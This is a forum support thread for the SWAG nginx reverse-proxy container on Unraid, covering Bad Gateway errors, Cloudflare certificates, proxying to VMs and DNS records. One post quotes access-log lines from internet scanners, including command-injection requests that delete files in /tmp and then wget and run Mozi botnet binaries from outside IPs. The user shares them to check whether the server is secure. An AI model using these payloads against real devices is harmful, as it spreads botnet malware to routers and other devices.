[Support] Linuxserver.io - SWAG - Secure Web Application Gateway (Nginx/PHP/Certbot/Fail2ban)


Recommended Posts

5 hours ago, alexandru360 said:

 

Nope ... I backed up all my configs, reset everything to default, cloned only deluge[...].conf and restarted swag and for subdomains I get Bad Gateway ... If someone has an idea I'll be all eyes ...

Just a thought: 
I saw on another thread here a response from 2019 that Nerd Pack might interfere with swag "mojo" ... is this still the case ?

Any luck sorting this out???

Link to comment
3 hours ago, alexandru360 said:

 

I uninstalled Nerd Tools ... deleted completely SWAG and reinstalled made all the configurations again and still Bad Gateway ... but the main domain works ... I am confused ... I think I have to investigate what Bad Gateway means for Nginx

It means nginx can't connect to the service. So you either have the name/IP/port wrong or not in the same custom bridge as nginx.

Link to comment

Hi all---I replaced my cache drives the other day and found when i turned back on dockers that nothing was listed at all.  So I added back in my templates and that seemed to work just fine save my swag docker.

 

Long story short, I ended up renaming the entire /config folder (which was a LONG time in use from very early letsencrypt days) and  and seeing if a complete reinstall worked.  Got caught with the rate limit of letsencrypt.  Is there a way I can move over the certs that were generated in the old /config structure?  Thanks!

 

RESOLVED:  In case anyone comes across this I came across a thread about CA Backup/Restore and completely forgot the app was running on my system.  Did a restore of everything and it's working perfectly now.

Edited by talmania
Link to comment
1 hour ago, saarg said:

For what? This container handles getting the certs.

 

I want use Swag with Cloudflare in Full (strict).

 

When I enable Full (strict), I get Invalid SSL certificate.

 

Any idea how to fix that?

Screen Shot 2021-01-27 at 7.05.54 PM.png

Edited by Moka
Link to comment

Does anyone know if its possible to use SWAG and point it to a VM not to a docker container at all?

 

Looking as the sample configuration, it seems all the info is pointing to a docker container, is it possible to have it point to a VM instead for hosting other non docker applications?

 

Is it even possible or does this only work for containers? 

 

 

Link to comment
1 hour ago, brent3000 said:

Does anyone know if its possible to use SWAG and point it to a VM not to a docker container at all?

 

Looking as the sample configuration, it seems all the info is pointing to a docker container, is it possible to have it point to a VM instead for hosting other non docker applications?

 

Is it even possible or does this only work for containers? 

 

 

Not entirely sure what you mean, but I reverse proxy sites on multiple vm's and containers on a second unraid using a single instance of swag. It all depends on how your network is set up. If you can access the site using a lan ip and port on a web browser, you likely can reverse proxy it for wan access.

Link to comment
2 minutes ago, jonathanm said:

but I reverse proxy sites on multiple vm's and containers on a second unraid using a single instance of swag.

This is what I'm after,

 

If i have a VM running a website (which is access via a local IP, what/how do i build a config or setup so SWAG will direct vm1.domain.com  to a VM?

 

All the sample ones are container based examples? or do i just put the VM name in its place?

Link to comment
1 minute ago, brent3000 said:

This is what I'm after,

 

If i have a VM running a website (which is access via a local IP, what/how do i build a config or setup so SWAG will direct vm1.domain.com  to a VM?

 

All the sample ones are container based examples? or do i just put the VM name in its place?

I don't use the samples, I just set things up like a normal nginx install. I learned from tutorials I searched in google. My personal preference is to keep my sites all in one main config file, with common blocks for repeated lines defined in other config files I reference. My install doesn't follow the included examples.

Link to comment
17 hours ago, Moka said:

 

I want use Swag with Cloudflare in Full (strict).

 

When I enable Full (strict), I get Invalid SSL certificate.

 

Any idea how to fix that?

Screen Shot 2021-01-27 at 7.05.54 PM.png

 

I don't know what full mode is, but if you need to use certs you get from cloudflare, then I don't think it's possible with swag.

 

Join our discord and you can ask there, as there are more people with more knowledge about swag.

Link to comment

Hi guys, I hope someone can help me with this because I've been banging my head against a wall for hours trying to figure out what is going wrong:

 

I followed Spaceinvader One's video on setting up a reverse proxy in unraid, but whenever I attempt to go to any of the addresses that should be pointed to my docker containers I end up at the SWAG landing page ("Welcome to your SWAG instance"). Any thoughts?

 

I really hope it is something obvious, but I've a bad feeling it isn't ... Please probe if I haven't given enough information.

  • Thanks 1
Link to comment
On 2/1/2020 at 6:03 AM, Coolsaber57 said:

I am trying to expose my Octoprint page, but am having trouble finding a configuration that will work.  

 

Here's the examples that Octoprint provides: https://community.octoprint.org/t/reverse-proxy-configuration-examples/1107

 

Here's my current config:

 


server {
    listen 443 ssl;
    listen [::]:443 ssl;

    server_name print.*;

    include /config/nginx/ssl.conf;

    client_max_body_size 0;

    location / {
        include /config/nginx/proxy.conf;
        proxy_pass http://192.168.2.13:80;
        proxy_set_header Host $http_host;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Scheme $scheme;

    }

}

I took out a few lines that were causing the docker container to throw errors.  I'm currently getting a 500 error.  If I copy a config from another container and change the IP/port/subdomain, I do actually get to see the login page, but it says it's offline and asks me to reconnect.

 

Has anyone successfully configured Octoprint in this container? If so, would you be able to share the config?

 

In the following 50 pages, it seems that there is still no solution to this? (I'm running into the same problem)

Link to comment
On 1/30/2021 at 4:32 AM, SockDust said:

I followed Spaceinvader One's video on setting up a reverse proxy in unraid, but whenever I attempt to go to any of the addresses that should be pointed to my docker containers I end up at the SWAG landing page ("Welcome to your SWAG instance"). Any thoughts?

Is there a specific app you are trying to route too? I also followed SI YouTube and it worked a treat, have you checked the log that the domain is clearing correctly or what method are you using (folder or domain level?)

Link to comment

Hi all,

 

Over the weekend is setup swag and nextcloud, following spaceinvaderone's guides. (https://scan.nextcloud.com/, gives all A+) I got everything working using my own domain (nexcloud.mydomain.com). I'm not a specialist but, so I'm not very confident about the security. So, I decided to let it running for about 20hrs, and check the logs and enter the ips on abuseipdb.com. I filtered all my activities out and am left with 158 lines in ngix log. Here and example:

https://www.abuseipdb.com/check/74.120.14.53
https://www.abuseipdb.com/check/180.163.220.5
https://www.abuseipdb.com/check/180.163.220.68
https://www.abuseipdb.com/check/27.115.124.70
https://www.abuseipdb.com/check/192.241.215.11

 

Next some lines, of which non are from my ips.

I understand the GET background, logo, ect. But kerbynet and wget from some ip, don't sound good.

GET / HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
POST /GponForm/diag_Form?images/ HTTP/1.1
/tmp/gpon80&ipv=0
POST /boaform/admin/formLogin HTTP/1.1
 400 0 -
GET /portal/redlion HTTP/1.1
HEAD http://112.124.42.80:63435/ HTTP/1.1
CONNECT 112.124.42.80:443 HTTP/1.1
HEAD http://110.242.68.4/ HTTP/1.1
CONNECT 110.242.68.4:443 HTTP/1.1
POST /HNAP1/ HTTP/1.0
\x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03\x11\xDFJ\x5CN\x8F\xA0\x89[\x9A\x84i=\x8A\x8FA\xEB\x98\xE3\xDB\xFDQ\xD1Iw\xFD\xED
HEAD /robots.txt HTTP/1.0
GET /login HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.229.54.251:50078/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
GET /actuator/health HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
OPTIONS / HTTP/1.1
HEAD /epa/scripts/win/nsepa_setup.exe HTTP/1.1
HEAD / HTTP/1.0
GET /cgi-bin/kerbynet?Action=Render&Object=StartSession HTTP/1.1
@\x00\x00\x00y0\x12\xD9\x9E9Q\x90\x8A\xED\xEE`\xCC\xB3\xD6|
\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
GET /hudson HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1
GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.99.138.110:45592/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
GET / HTTP/2.0 http://baidu.com/
GET /login HTTP/2.0 http://baidu.com/
GET / HTTP/2.0 
GET /login HTTP/2.0 
GET /apps/files_rightclick/css/app.css?v=46c85d58-8 HTTP/2.0
GET /core/css/guest.css?v=c3182750-8 HTTP/2.0
GET /apps/files_videoplayer/js/main.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/files_fileinfo.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/files_client.js?v=c3182750-8 HTTP/2.0
GET /apps/files_sharing/js/dist/main.js?v=c3182750-8 HTTP/2.0
GET /apps/files_pdfviewer/js/files_pdfviewer-public.js?v=c3182750-8 HTTP/2.0
GET /apps/files_rightclick/js/script.js?v=c3182750-8 HTTP/2.0
GET /apps/files_rightclick/js/files.js?v=c3182750-8 HTTP/2.0
GET /apps/theming/js/theming.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/main.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/login.js?v=c3182750-8 HTTP/2.0
GET /js/core/merged-template-prepend.js?v=c3182750-8 HTTP/2.0
GET /core/js/oc.js?v=c3182750 HTTP/2.0
GET /apps/theming/styles?v=8 HTTP/2.0
GET /apps/theming/image/logo?useSvg=1&v=8 HTTP/2.0
GET /apps/accessibility/css/user-a82fd95db10ff25dfad39f07372ebe37 HTTP/2.0
GET /core/img/actions/confirm-white.svg?v=2 HTTP/2.0
GET /core/img/loading-dark.gif HTTP/2.0
GET /core/img/actions/toggle.svg HTTP/2.0
GET /apps/theming/image/logo?v=8 HTTP/2.0
GET /csrftoken HTTP/2.0
GET /apps/theming/image/background?v=8 HTTP/2.0
GET /csrftoken HTTP/2.0
GET /apps/theming/favicon?v=8 HTTP/1.1
GET /csrftoken HTTP/2.0

 

Are there some obvious things I forgot to do?

considering the ip locations, geo blocking wouldn't be a bad idea. I dont leave the country much, so blocking about the whole world exept 2/3 countys would probably be an option.

 

Thanks,

 

edit: found something on geo blocking https://technicalramblings.com/blog/blocking-countries-with-geolite2-using-the-letsencrypt-docker-container/

ofc, running into issues, I'm missing something verry obvious.

Edited by ZekerPixels
Link to comment

Hi.  I was wondering if somebody could help me as I am getting a cert does not exist error.  I've so far followed SpaceInvader Ones youtube video up to the point of setting up my DNS Cname records, and forwarding my ports (see pictures below).

I am using Google domains as my registar.  I am not using duckdns at all.  I have a static IP.  The red boxes in the picture are all mydomain.com and the purple box is my wan IP.


Capture.thumb.PNG.b5c23f40859812d065621b51163fa46d.PNG


If I try to RDP into my Windows machine using mydomain.com:3389 or www.mydomain.com:3389 , which are both forwaarded to my IP as "A" records, it works.  If I try cloud.mydomain.com:3389 it just fails.  Do I need to create an "A" record for cloud. and video. as well?  I suppose there was a bit of a disconnect here since the video guide space invader one made talks about using duck DNS, which i'm not using, and im guessing his duckdns config somehow has that setup already for him?

Here is my picture of my port forwarding on my router Capture2.thumb.PNG.46b5151a2509e9eb0e2f478676641d2b.PNG

 

Capture.PNG

Capture2.PNG

 

Edit: I figured it out.  In case anybody sees this in the future, you need to also forward your subdomains to your IP (which is basically creating A records for each, but through the forwarding options on google domains, rather than the custom resource records options), as well as making the Cname records in the custom resource records options, which point to the main domain.

Edited by 007craft
  • Like 1
Link to comment
On 2/2/2021 at 8:42 AM, ZekerPixels said:

I filtered all my activities out and am left with 158 lines in ngix log

May i ask where you got this log data from? Just interested to see on mine also :)

 

My router is getting hit alot by port scans etc all landing on the webserver (80 and 443) but its pretty normal sadly just bots scanning IP ranged trying a bunch of things and then moving on unless they get a hit

Link to comment
9 hours ago, brent3000 said:

May i ask where you got this log data from? Just interested to see on mine also :)

 

My router is getting hit alot by port scans etc all landing on the webserver (80 and 443) but its pretty normal sadly just bots scanning IP ranged trying a bunch of things and then moving on unless they get a hit

 

of course its in /appdata/swag/log/nginx/access.log

 

I understand the bot searching for something unsecured, as long as its secured it doesnt realy do anything. But I'm trying to understand what is happening and I want to be conviced it is secured before actualy using it. And I realy want to have geo blocking working, it doesnt hurt using it and https://www.spamhaus.org/statistics/botnet-cc/ well those get blocked.

But kerbynet I mentioned, turns out to be an old router exploit.

Link to comment

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.